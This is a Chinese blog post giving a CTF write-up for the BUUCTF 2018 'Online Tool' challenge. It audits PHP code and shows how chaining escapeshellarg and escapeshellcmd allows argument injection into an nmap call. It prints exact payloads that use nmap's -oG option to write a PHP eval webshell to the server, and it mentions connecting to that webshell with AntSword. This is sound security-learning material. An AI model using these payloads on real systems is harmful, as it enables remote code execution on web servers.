[BUUCTF 2018]Online Tool (escapeshellarg和escapeshellcmd双写利用)

最新推荐文章于 2024-01-28 20:22:07 发布
最新推荐文章于 2024-01-28 20:22:07 发布
阅读量583 收藏
点赞数 1
分类专栏: CTF 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44749590/article/details/124841507
版权

[BUUCTF 2018]Online Tool (escapeshellarg和escapeshellcmd双写绕过单引号)

思路

打开页面是一段php代码,开始代码审计:

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
    //X_Forwarded_For和Remote_Addr没啥问题
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    //百度了一下escapeshellarg和escapeshellcmd双写可以利用单引号的转义绕过限制
    
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
    //利用-oG参数,将命令和命令执行结果写入到指定文件中,这里可以指定php文件,上传一句话木马
}

两个函数的功能:

string escapeshellarg ( string $arg )

把字符串转码为可以在 shell 命令里使用的参数
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符

string escapeshellcmd ( string $command )

shell 元字符转义
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义;反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$, \x0A 和 \xFF;’ 和 " 仅在不配对儿的时候被转义;在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替

举个栗子:
1、输入:$host=' <?php @eval($_POST["cmd"]);?> -oG attack.php '
2、escapeshellarg(host):$host=''\'' <?php @eval($_POST["hack"]);?> -oG attack.php '\'''
首先会使用转义符\对单引号'进行转义'\'',并在字符串两端加上单引号''\'' <?php @eval($_POST["hack"]);?> -oG hack.php '\'''
3、escapeshellcmd(host):$host=''\\'' \<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG attack.php '\\''' 对于上文包含的特殊符前会插入反斜杠进行转义,另外在不成对的单引号和双引号前也会插入反斜杠进行转义,此处单引号均成对儿无需转义。
4、最后\\ 解释为\而非转义符,所以后面的单引号''成了空白连接符,一句话木马中的反斜杠均为转义字符,最后同为非转义字符,形成连接符。简化为:''\'' <?php @eval($_POST["hack"]);?> -oG attack.php '\'''
5、带入到system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);nmap -T5 -sT -Pn --host-timeout 2 -F ''\'' <?php @eval($_POST["hack"]);?> -oG attack.php '\'''
6、利用nmap -oG 参数将命令语句和执行结果存储到attack.php文件中,这样一句话木马就以php文件格式上传到目录上。
7、最后根据回显文件名利用蚁剑完成连接获取flag。

对比:
正确playload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '         
''\'' <?php @eval($_POST["hack"]);?> -oG hack.php '\'''
''\\'' <\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php '\\'''   
nmap -T5 -sT -Pn --host-timeout 2 -F ''\'' <?php @eval($_POST["hack"]);?> -oG hack.php '\'''

错误playload:

<?php @eval($_POST["cmd"]);?> -oG yjh.php
'<?php @eval($_POST["cmd"]);?> -oG yjh.php'
'\<\?php @eval\(\$_POST\["cmd"\]\)\;\?\> -oG yjh.php'
nmap -T5 -sT -Pn --host-timeout 2 -F '<?php @eval($_POST["cmd"]);?> -oG yjh.php'

总结:
1、考察利用escapeshellarg 和escapeshellcmd函数双写绕过'
2、利用nmap -oG 参数将一句话木马上传到站点目录。

参考
[1]: https://paper.seebug.org/164/

甜筒化了 -
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php escapeshellcmd,利用/绕过 PHP escapeshellarg/escapeshellcmd函数
weixin_42138703的博客
03-11 2534
escapeshellargescapeshellcmd的功能escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的命令让我们用groups去打印组里每个username成员$username = 'myuser';system(...
PHP escapeshellarg()+escapeshellcmd()绕过
rev1ve的博客
12-08 2440
这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。当进行escapeshellarg()函数处理后,会先进行字符转义,变成如下。那么我们在传入参数的前面添加单引号,后面空格加单引号。
escapeshellarg参数绕过和注入的问题
m0_75178803的博客
12-14 1352
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回。用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。在windows系统中,system函数直接在控制台调用一个command命令。参数,命令执行后的返回状态会被写入到此变量。参数, 那么会用命令执行的输出填充此数组。)都会被一个额外的反斜线所转义。
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2939
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
escapeshellargescapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 1301
知识点:escapeshellargescapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
[BUUCTF 2018]Online Tool
m0_62709637的博客
05-09 1317
新知识: escapeshellarg()函数: 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号; escapeshellcmd()函数: 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将&#;`|*?~<>^()[]{}$\, \x0A和\xFF以及不配对的单/双引号转义; 这两个函数若同时使用,将会产生逻辑漏洞; 个人理解防范原理:将特殊符号进行转译处理,使其变为字符串,从而无法发挥正常作用; 绕过方
php使用escapeshellarg时中文被过滤的解决方法
10-21
主要介绍了php使用escapeshellarg时中文被过滤的解决方法,测试后发现问题的原因是shell和apache php-cgi的运行环境不同引起的,需要的朋友可以参考下
如何利用内置PHP灵活性执行外部程序.pdf
11-03
此外,我们还可以使用escapeshellcmd()和escapeshellarg()函数来“清除”命令字符串和变量,以防止用户输入的恶意命令。例如: `exec(escapeshellcmd($cmd));` 最后,让我们来看一下安全模式。在某些情况下,我们...
13-PHPFileValidation:PHP和MySQL第5版
03-27
3. **安全检查**:使用`escapeshellcmd()`和`escapeshellarg()`防止文件名中的特殊字符导致的安全问题。 4. **病毒扫描**:可能还会讲解如何集成第三方库或服务进行病毒扫描,如使用`finfo_file()`检查文件的签名。 ...
Audit-Learning:记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获
02-01
为降低风险,可以使用`escapeshellarg()`和`escapeshellcmd()`对参数进行转义,或者使用PHP内置的进程控制函数如`pcntl_exec()`,以更安全的方式执行命令。 除了这些函数,还有其他一些可能导致安全问题的函数,如`...
[Web 安全]命令执行漏洞
weixin_46181386的博客
01-16 325
命令执行漏洞
php escapeshellcmd,从escapeshellcmd bypass说起到宽字节注入
weixin_42500195的博客
03-11 518
1 php 多字节绕过escapeshellcmdescapeshellcmd()对shell元字符过滤加反斜杠;反斜线(\)会在以下字符之前插入: #&;`|*?~<>^()[]{}$, \x0A 和 \xFF,但在php5.2.5及之前存在通过输入多字节绕过escapeshellcmd的问题。5.2.6 已经修复了该问题。执行 escapeshellcmd("echo "....
[BUUCTF 2018]Online Tool(特详解)
最新发布
qq_74806534的博客
01-28 2万+
即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。这意味着 PHP 脚本的当前工作目录将被更改为用户特定的沙盒目录,后续的文件和命令将在这个目录下执行。
BUUCTF-Online Tool
m0_47571887的博客
11-10 686
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
CTF中一些绕过
qq_41996851的博客
04-23 2434
PHP 主要体现在序列化中; php中的类会有构造函数和析构函数,也还有内置的一些其他语言没有的函数: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; // 构造函数,声明对象时触发 public function __construct($username,$password){
escapeshellarg
03-16
escapeshellarg是一个PHP函数,用于将字符串转义为安全shell参数。它可以确保字符串中的特殊字符不会被shell解释为命令或选项。这个函数通常用于构建shell命令行参数,以避免命令注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值